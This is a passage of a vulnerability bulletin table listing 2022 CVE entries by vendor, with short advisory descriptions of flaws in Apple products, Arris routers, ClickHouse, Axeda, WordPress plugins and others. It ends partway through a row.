| apple — multiple_products | A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. Processing a maliciously crafted file may lead to arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22584 MISC MISC MISC MISC |
| apple — multiple_products | A permissions issue was addressed with improved validation. This issue is fixed in Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access restricted files. | 2022-03-18 | not yet calculated | CVE-2022-22583 MISC MISC MISC |
| apple — multiple_products | An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. Processing a maliciously crafted STL file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22579 MISC MISC MISC MISC MISC |
| apple — multiple_products | A memory initialization issue was addressed with improved memory handling. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22657 MISC MISC MISC |
| apple — multiple_products | A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22614 MISC MISC MISC MISC MISC MISC |
| apple — multiple_products | A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4. A malicious website may be able to access information about the user and their devices. | 2022-03-18 | not yet calculated | CVE-2022-22653 MISC |
| apple — multiple_products | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. | 2022-03-18 | not yet calculated | CVE-2022-22627 MISC MISC MISC |
| apple — multiple_products | A buffer overflow was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. A malicious application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22634 MISC MISC |
| apple — multiple_products | An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to gain elevated privileges. | 2022-03-18 | not yet calculated | CVE-2022-22635 MISC MISC |
| apple — multiple_products | An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22636 MISC MISC |
| apple — multiple_products | This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions. | 2022-03-18 | not yet calculated | CVE-2022-22622 MISC |
| apple — multiple_products | This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to read restricted memory. | 2022-03-18 | not yet calculated | CVE-2022-22648 MISC MISC MISC |
| apple — multiple_products | An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges. | 2022-03-18 | not yet calculated | CVE-2022-22631 MISC MISC MISC |
| apple — multiple_products | A null pointer dereference was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An attacker in a privileged position may be able to perform a denial of service attack. | 2022-03-18 | not yet calculated | CVE-2022-22638 MISC MISC MISC MISC MISC MISC |
| apple — multiple_products | A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. | 2022-03-18 | not yet calculated | CVE-2022-22639 MISC MISC |
| apple — multiple_products | A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22640 MISC MISC MISC MISC |
| apple — multiple_products | A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. | 2022-03-18 | not yet calculated | CVE-2022-22641 MISC MISC MISC |
| apple — multiple_products | This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt. | 2022-03-18 | not yet calculated | CVE-2022-22642 MISC |
| apple — multiple_products | A logic issue was addressed with improved state management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, watchOS 8.5, macOS Monterey 12.3. A malicious application may be able to elevate privileges. | 2022-03-18 | not yet calculated | CVE-2022-22632 MISC MISC MISC MISC MISC |
| apple — multiple_products | A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22633 MISC MISC MISC MISC |
| apple — multiple_products | This issue was addressed with improved checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions. | 2022-03-18 | not yet calculated | CVE-2022-22621 MISC MISC MISC MISC |
| apple — multiple_products | A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. | 2022-03-18 | not yet calculated | CVE-2022-22620 MISC MISC MISC |
| apple — multiple_products | This issue was addressed with improved checks. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt. | 2022-03-18 | not yet calculated | CVE-2022-22618 MISC MISC |
| apple — multiple_products | A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges. | 2022-03-18 | not yet calculated | CVE-2022-22617 MISC MISC MISC |
| apple — multiple_products | A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22615 MISC MISC MISC MISC MISC MISC |
| apple — multiple_products | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. | 2022-03-18 | not yet calculated | CVE-2022-22626 MISC MISC MISC |
| apple — multiple_products | An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. | 2022-03-18 | not yet calculated | CVE-2022-22625 MISC MISC MISC |
| apple — multiple_products | A memory consumption issue was addressed with improved memory handling. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to heap corruption. | 2022-03-18 | not yet calculated | CVE-2022-22612 MISC MISC MISC MISC MISC |
| apple — multiple_products | An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22611 MISC MISC MISC MISC MISC |
| apple — multiple_products | This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A plug-in may be able to inherit the application’s permissions and access user data. | 2022-03-18 | not yet calculated | CVE-2022-22650 MISC MISC MISC |
| apple — multiple_products | The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen. | 2022-03-18 | not yet calculated | CVE-2022-22652 MISC |
| apple — multiple_products |
An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen. | 2022-03-18 | not yet calculated | CVE-2022-22656 MISC MISC MISC |
| apple — multiple_products |
An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6, watchOS 7.5, tvOS 14.6. Processing a maliciously crafted font file may lead to arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2021-30771 MISC MISC MISC MISC |
| apple — multiple_products |
A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing a maliciously crafted mail message may lead to running arbitrary javascript. | 2022-03-18 | not yet calculated | CVE-2022-22589 MISC MISC MISC MISC MISC |
| apple — multiple_products |
A logic issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. A malicious application may be able to gain root privileges. | 2022-03-18 | not yet calculated | CVE-2022-22578 MISC MISC MISC MISC |
| apple — multiple_products |
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. | 2022-03-18 | not yet calculated | CVE-2022-22613 MISC MISC MISC MISC MISC MISC |
| apple — xcode | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22602 MISC |
| apple — xcode | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22607 MISC |
| apple — xcode | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22606 MISC |
| apple — xcode | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22605 MISC |
| apple — xcode | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22604 MISC |
| apple — xcode | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22603 MISC |
| apple — xcode |
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22608 MISC |
| apple — xcode |
An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. | 2022-03-18 | not yet calculated | CVE-2022-22601 MISC |
| archivista — dms |
Cross-site Scripting (XSS) vulnerability in ArchivistaBox webclient allows an attacker to craft a malicious link, executing JavaScript in the context of a victim’s browser. This issue affects all ArchivistaBox versions prior to 2022/I. | 2022-03-16 | not yet calculated | CVE-2021-42552 CONFIRM |
| argencoders-notevil — argencoders-notevil |
This affects all versions of package notevil; all versions of package argencoders-notevil. It is vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing an attacker to add or modify an object’s prototype. **Note:** This vulnerability derives from an incomplete fix in [SNYK-JS-NOTEVIL-608878](https://security.snyk.io/vuln/SNYK-JS-NOTEVIL-608878). | 2022-03-17 | not yet calculated | CVE-2021-23771 MISC MISC |
| ari_fancy_lightbox — ari_fancy_lightbox |
The ARI Fancy Lightbox WordPress plugin before 1.3.9 does not sanitise and escape the msg parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting | 2022-03-14 | not yet calculated | CVE-2022-0161 MISC CONFIRM |
| arm — cortex_and_neoverse_processors |
Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information. | 2022-03-13 | not yet calculated | CVE-2022-23960 CONFIRM MISC MLIST |
| arris — routers | Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the firewall-local log function via the EmailAddress, SmtpServerName, SmtpUsername, and SmtpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26990 MISC |
| arris — routers | Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ntp function via the TimeZone parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26991 MISC |
| arris — routers | Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pppoe function via the pppoeUserName, pppoePassword, and pppoe_Service parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26993 MISC |
| arris — routers | Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the ddns function via the DdnsUserName, DdnsHostName, and DdnsPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26992 MISC |
| arris — routers |
Arris routers SBR-AC1900P 1.0.7-B05, SBR-AC3200P 1.0.7-B05 and SBR-AC1200P 1.0.5-B05 were discovered to contain a command injection vulnerability in the pptp function via the pptpUserName and pptpPassword parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26994 MISC |
| arris — tr3300 | Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the wps setting function via the wps_enrolee_pin parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26998 MISC |
| arris — tr3300 | Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pptp (wan_pptp.html) function via the pptp_fix_ip, pptp_fix_mask, pptp_fix_gw, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26995 MISC |
| arris — tr3300 | Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the pppoe function via the pppoe_username, pppoe_passwd, and pppoe_servicename parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26996 MISC |
| arris — tr3300 | Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the time and time zone function via the h_primary_ntp_server, h_backup_ntp_server, and h_time_zone parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-27000 MISC |
| arris — tr3300 | Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the upnp function via the upnp_ttl parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26997 MISC |
| arris — tr3300 | Arris TR3300 v1.0.13 was discovered to contain a command injection vulnerability in the static ip settings function via the wan_ip_stat, wan_mask_stat, wan_gw_stat, and wan_dns1_stat parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-26999 MISC |
| arris — tr3300 | Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the dhcp function via the hostname parameter. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-27001 MISC |
| arris — tr3300 |
Arris TR3300 v1.0.13 were discovered to contain a command injection vulnerability in the ddns function via the ddns_name, ddns_pwd, h_ddns?ddns_host parameters. This vulnerability allows attackers to execute arbitrary commands via a crafted request. | 2022-03-15 | not yet calculated | CVE-2022-27002 MISC |
| atlassian — fisheye_and_crucible | The jQuery deserialize library in Fisheye and Crucible before version 4.8.9 allowed remote attackers to to inject arbitrary HTML and/or JavaScript via a prototype pollution vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-43956 MISC MISC |
| atlassian — fisheye_and_crucible | Affected versions of Atlassian Fisheye & Crucible allowed remote attackers to browse local files via an Insecure Direct Object References (IDOR) vulnerability in the WEB-INF directory and bypass the fix for CVE-2020-29446 due to a lack of url decoding. The affected versions are before version 4.8.9. | 2022-03-16 | not yet calculated | CVE-2021-43957 MISC MISC |
| atlassian — fisheye_and_crucible |
The /rest-service-fecru/server-v1 resource in Fisheye and Crucible before version 4.8.9 allowed authenticated remote attackers to obtain information about installation directories via information disclosure vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-43955 MISC MISC |
| atlassian — fisheye_and_crucible |
Various rest resources in Fisheye and Crucible before version 4.8.9 allowed remote attackers to brute force user login credentials as rest resources did not check if users were beyond their max failed login limits and therefore required solving a CAPTCHA in addition to providing user credentials for authentication via a improper restriction of excess authentication attempts vulnerability. | 2022-03-16 | not yet calculated | CVE-2021-43958 MISC MISC |
| atom — cms |
Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the “A” parameter in /widgets/debug.php. | 2022-03-15 | not yet calculated | CVE-2022-25489 MISC |
| atom — cms |
Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. | 2022-03-15 | not yet calculated | CVE-2022-25487 MISC |
| atom — cms |
Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. | 2022-03-15 | not yet calculated | CVE-2022-25488 MISC |
| automotive_grade_linux_kooky_koi — automotive_grade_linux_kooky_koi |
Automotive Grade Linux Kooky Koi 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, and 11.0.5 is affected by Incorrect Access Control in usr/bin/afb-daemon. To exploit the vulnerability, an attacker should send a well-crafted HTTP (or WebSocket) request to the socket listened by the afb-daemon process. No credentials nor user interactions are required. | 2022-03-18 | not yet calculated | CVE-2022-24595 MISC |
| axeda — agent_and_desktop_server_for_windows | Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) uses hard-coded credentials for its UltraVNC installation. Successful exploitation of this vulnerability could allow a remote authenticated attacker to take full remote control of the host operating system. | 2022-03-16 | not yet calculated | CVE-2022-25246 MISC MISC |
| axeda — agent_and_desktop_server_for_windows | Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain commands to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to obtain full file-system access and remote code execution. | 2022-03-16 | not yet calculated | CVE-2022-25247 MISC MISC |
| axeda — agent_and_desktop_server_for_windows | When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send a certain command to a specific port without authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to shut down a specific service. | 2022-03-16 | not yet calculated | CVE-2022-25250 MISC MISC |
| axeda — agent_and_desktop_server_for_windows | When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) supplies the event log of the specific service. | 2022-03-16 | not yet calculated | CVE-2022-25248 MISC MISC |
| axeda — agent_and_desktop_server_for_windows | When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) (disregarding Axeda agent v6.9.2 and v6.9.3) is vulnerable to directory traversal, which could allow a remote unauthenticated attacker to obtain file system read access via web server.. | 2022-03-16 | not yet calculated | CVE-2022-25249 MISC MISC |
| axeda — agent_and_desktop_server_for_windows | When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) may allow an attacker to send certain XML messages to a specific port without proper authentication. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to read and modify the affected product’s configuration. | 2022-03-16 | not yet calculated | CVE-2022-25251 MISC MISC |
| axeda — agent_and_desktop_server_for_windows |
When connecting to a certain port Axeda agent (All versions) and Axeda Desktop Server for Windows (All versions) when receiving certain input throws an exception. Services using said function do not handle the exception. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to crash the affected product. | 2022-03-16 | not yet calculated | CVE-2022-25252 MISC MISC |
| bareos — bareos | Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, a failed PAM authentication will leak a small amount of memory. An attacker that is able to use the PAM Console (i.e. by knowing the shared secret or via the WebUI) can flood the Director with failing login attempts which will eventually lead to an out-of-memory condition in which the Director will not work anymore. Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 contain a Bugfix for this problem. Users who are unable to upgrade may disable PAM authentication as a workaround. | 2022-03-15 | not yet calculated | CVE-2022-24756 MISC CONFIRM MISC MISC MISC |
| bareos — bareos |
Bareos is open source software for backup, archiving, and recovery of data for operating systems. When Bareos Director >= 18.2 >= 18.2 but prior to 21.1.0, 20.0.6, and 19.2.12 is built and configured for PAM authentication, it will skip authorization checks completely. Expired accounts and accounts with expired passwords can still login. This problem will affect users that have PAM enabled. Currently there is no authorization (e.g. check for expired or disabled accounts), but only plain authentication (i.e. check if username and password match). Bareos Director versions 21.1.0, 20.0.6 and 19.2.12 implement the authorization check that was previously missing. The only workaround is to make sure that authentication fails if the user is not authorized. | 2022-03-15 | not yet calculated | CVE-2022-24755 MISC MISC MISC CONFIRM MISC |
| bitbucket_pipeline_variable — bitbucket_pipeline_variable |
A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality. | 2022-03-16 | not yet calculated | CVE-2021-20180 MISC |
| bodymen — bodymen |
The package bodymen from 0.0.0 are vulnerable to Prototype Pollution via the handler function which could be tricked into adding or modifying properties of Object.prototype using a __proto__ payload. **Note:** This vulnerability derives from an incomplete fix to [CVE-2019-10792](https://security.snyk.io/vuln/SNYK-JS-BODYMEN-548897) | 2022-03-17 | not yet calculated | CVE-2022-25296 MISC |
| braintree — sanitizeurl |
The package @braintree/sanitize-url before 6.0.0 are vulnerable to Cross-site Scripting (XSS) due to improper sanitization in sanitizeUrl function. | 2022-03-16 | not yet calculated | CVE-2021-23648 MISC MISC MISC MISC |
| brocade — fabric_os |
A vulnerability in the Brocade Fabric OS before Brocade Fabric OS v9.0.1a, v8.2.3, v8.2.0_CBN4, and v7.4.2h could allow an authenticated CLI user to abuse the history command to write arbitrary content to files. | 2022-03-18 | not yet calculated | CVE-2020-15388 MISC |
| brocade — fabric_os |
The Web application of Brocade Fabric OS before versions Brocade Fabric OS v9.0.1a and v8.2.3a contains debug statements that expose sensitive information to the program’s standard output device. An attacker who has compromised the FOS system may utilize this weakness to capture sensitive information, such as user credentials. | 2022-03-18 | not yet calculated | CVE-2021-27789 MISC |
| chainsafe — libp2p-noise |
`@chainsafe/libp2p-noise` contains TypeScript implementation of noise protocol, an encryption protocol used in libp2p. `@chainsafe/libp2p-noise` before 4.1.2 and 5.0.3 does not correctly validate signatures during the handshake process. This may allow a man-in-the-middle to pose as other peers and get those peers banned. Users should upgrade to version 4.1.2 or 5.0.3 to receive a patch. There are currently no known workarounds. | 2022-03-17 | not yet calculated | CVE-2022-24759 MISC MISC CONFIRM |
| ckeditor4 — ckeditor4 | CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. CKEditor4 prior to version 4.18.0 contains a vulnerability in the `dialog` plugin. The vulnerability allows abuse of a dialog input validator regular expression, which can cause a significant performance drop resulting in a browser tab freeze. A patch is available in version 4.18.0. There are currently no known workarounds. | 2022-03-16 | not yet calculated | CVE-2022-24729 MISC CONFIRM CONFIRM |
| ckeditor4 — ckeditor4 |
CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A vulnerability has been discovered in the core HTML processing module and may affect all plugins used by CKEditor 4 prior to version 4.18.0. The vulnerability allows someone to inject malformed HTML bypassing content sanitization, which could result in executing JavaScript code. This problem has been patched in version 4.18.0. There are currently no known workarounds. | 2022-03-16 | not yet calculated | CVE-2022-24728 MISC CONFIRM MISC CONFIRM |
| classcms — classcms |
Classcms v2.5 and below contains an arbitrary file upload via the component classclassupload. This vulnerability allows attackers to execute code injection via a crafted .txt file. | 2022-03-18 | not yet calculated | CVE-2022-25581 MISC |
| clickhouse — dbms | Heap buffer overflow in Clickhouse’s LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. This issue is very similar to CVE-2021-43304, but the vulnerable copy operation is in a different wildCopy call. | 2022-03-14 | not yet calculated | CVE-2021-43305 MISC |
| clickhouse — dbms | Divide-by-zero in Clickhouse’s Gorilla compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. | 2022-03-14 | not yet calculated | CVE-2021-42391 MISC |
| clickhouse — dbms | Divide-by-zero in Clickhouse’s Delta compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. | 2022-03-14 | not yet calculated | CVE-2021-42389 MISC |
| clickhouse — dbms | Heap out-of-bounds read in Clickhouse’s LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed data. The offset is later used in the length of a copy operation, without checking the lower bounds of the source of the copy operation. | 2022-03-14 | not yet calculated | CVE-2021-42388 MISC |
| clickhouse — dbms | Divide-by-zero in Clickhouse’s DeltaDouble compression codec when parsing a malicious query. The first byte of the compressed buffer is used in a modulo operation without being checked for 0. | 2022-03-14 | not yet calculated | CVE-2021-42390 MISC |
| clickhouse — dbms |
Heap buffer overflow in Clickhouse’s LZ4 compression codec when parsing a malicious query. There is no verification that the copy operations in the LZ4::decompressImpl loop and especially the arbitrary copy operation wildCopy<copy_amount>(op, ip, copy_end), don’t exceed the destination buffer’s limits. | 2022-03-14 | not yet calculated | CVE-2021-43304 MISC |
| clickhouse — dbms |
Heap out-of-bounds read in Clickhouse’s LZ4 compression codec when parsing a malicious query. As part of the LZ4::decompressImpl() loop, a 16-bit unsigned user-supplied value (‘offset’) is read from the compressed data. The offset is later used in the length of a copy operation, without checking the upper bounds of the source of the copy operation. | 2022-03-14 | not yet calculated | CVE-2021-42387 MISC |
| cometd — cometd |
CometD is a scalable comet implementation for web messaging. In any version prior to 5.0.11, 6.0.6, and 7.0.6, internal usage of Oort and Seti channels is improperly authorized, so any remote user could subscribe and publish to those channels. By subscribing to those channels, a remote user may be able to watch cluster-internal traffic that contains other users’ (possibly sensitive) data. By publishing to those channels, a remote user may be able to create/modify/delete other user’s data and modify the cluster structure. A fix is available in versions 5.0.11, 6.0.6, and 7.0.6. As a workaround, install a custom `SecurityPolicy` that forbids subscription and publishing to remote, non-Oort, sessions on Oort and Seti channels. | 2022-03-15 | not yet calculated | CVE-2022-24721 MISC CONFIRM |
| commonsbooking — commonsbooking |
The CommonsBooking WordPress plugin before 2.6.8 does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection | 2022-03-14 | not yet calculated | CVE-2022-0658 MISC |
| contact_form_x — contact_form_x |
Reflected Cross-Site Scripting (XSS) vulnerability affecting parameter &tab discovered in Contact Form X WordPress plugin (versions <= 2.4). | 2022-03-11 | not yet calculated | CVE-2022-25601 CONFIRM CONFIRM FEDORA FEDORA |
| contao — managed_edition |
Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter. | 2022-03-18 | not yet calculated | CVE-2022-26265 MISC |
| countdown_coming_soon — countdown_coming_soon |
The Countdown, Coming Soon, Maintenance WordPress plugin before 2.2.9 does not sanitize and escape the post parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. | 2022-03-14 | not yet calculated | CVE-2022-0601 CONFIRM MISC |
| cri-o — cri-o |
